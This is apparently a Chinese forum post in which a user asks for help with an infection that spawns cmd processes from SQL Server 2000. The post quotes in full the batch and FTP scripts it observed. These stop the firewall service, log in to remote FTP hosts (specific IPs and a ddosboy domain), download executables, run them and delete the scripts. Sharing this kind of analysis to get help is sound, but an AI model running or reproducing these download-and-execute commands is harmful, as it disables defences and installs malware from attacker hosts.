装SQL server就100%中毒,请高手指点解决方法
最近老是发现自动增加很多cmd进程,只要一装SQL server就100%中毒,它们也不增加系统资源,但是杀死这个进程后不久又会自动添加上来。通过跟踪和观察发现这些cmd进程sqlserver进程生成的。这些cmd进程执行如下两个批处理代码
第一个:
"C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess
&echo open 61.160.212.45>dboy.sys
&echo wunai>>dboy.sys
&echo wunai$>>dboy.sys
&echo get ver.exe C:\boots.exe>>dboy.sys
&echo bye>>dboy.sys
&echo ftp -s:dboy.sys>dboy.bat
&echo copy C:\boots.exeC:\WINDOWS\system32\inf\test.exe
&echo start start /high "" C:\WINDOWS\system32\inf\test.exe
&echo start C:\boots.exe>>dboy.bat
&echo start C:\boots.exe>>dboy.bat
&echo del dboy.sys>>dboy.bat
&echo del %0>>dboy.bat&dboy.bat
第二个
"C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess
&echo open ddosboy1.3322.org >dboy1.sys
&echo dboy>>dboy1.sys
&echo if>>dboy1.sys
&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys
&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat
&system1.bat
这很明显是病毒通过cmd批处理调用dboy.sys。
经查系统system32下有dboy.sys和dboy1.sys,另外还有一个dboy.bat
这两个文件的代码如下
第一个:
open 218.61.11.180
12369
14789
get wm.exe C:\boots.exe
bye
第二个:
open ddosboy1.3322.org
dboy
if
get dboy1.exe C:\Windows\tcpsrv1.exe
bye
第三个bat文件
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0
然后c盘根目录拷贝boots.exe到c:\WINDOWS\system32\inf\test.exe
然后运行这个test.exe文件
在上面代码中提到的这些文件test.exe、boots.exe、tcpsrv1.exe、system1.bat都没有发现。
我分析可能是病毒在copy过程中被杀毒软件阻止,然后上述这些文件就没有生成,但是执行copy任务的批处理cmd却滞留在了进程中。
所以我可以在进程中发现他们的踪迹。
不知大家有没有中过类似的病毒,是我下载的SQLSERVER2000本身就有病毒还是其它原因
但是如何把这些讨厌的病毒赶尽杀绝呢?sqlserver肯定是不能删除的,那样工程就搞大了。不知道哪位大侠有什么其他高招呢?谢谢先咯。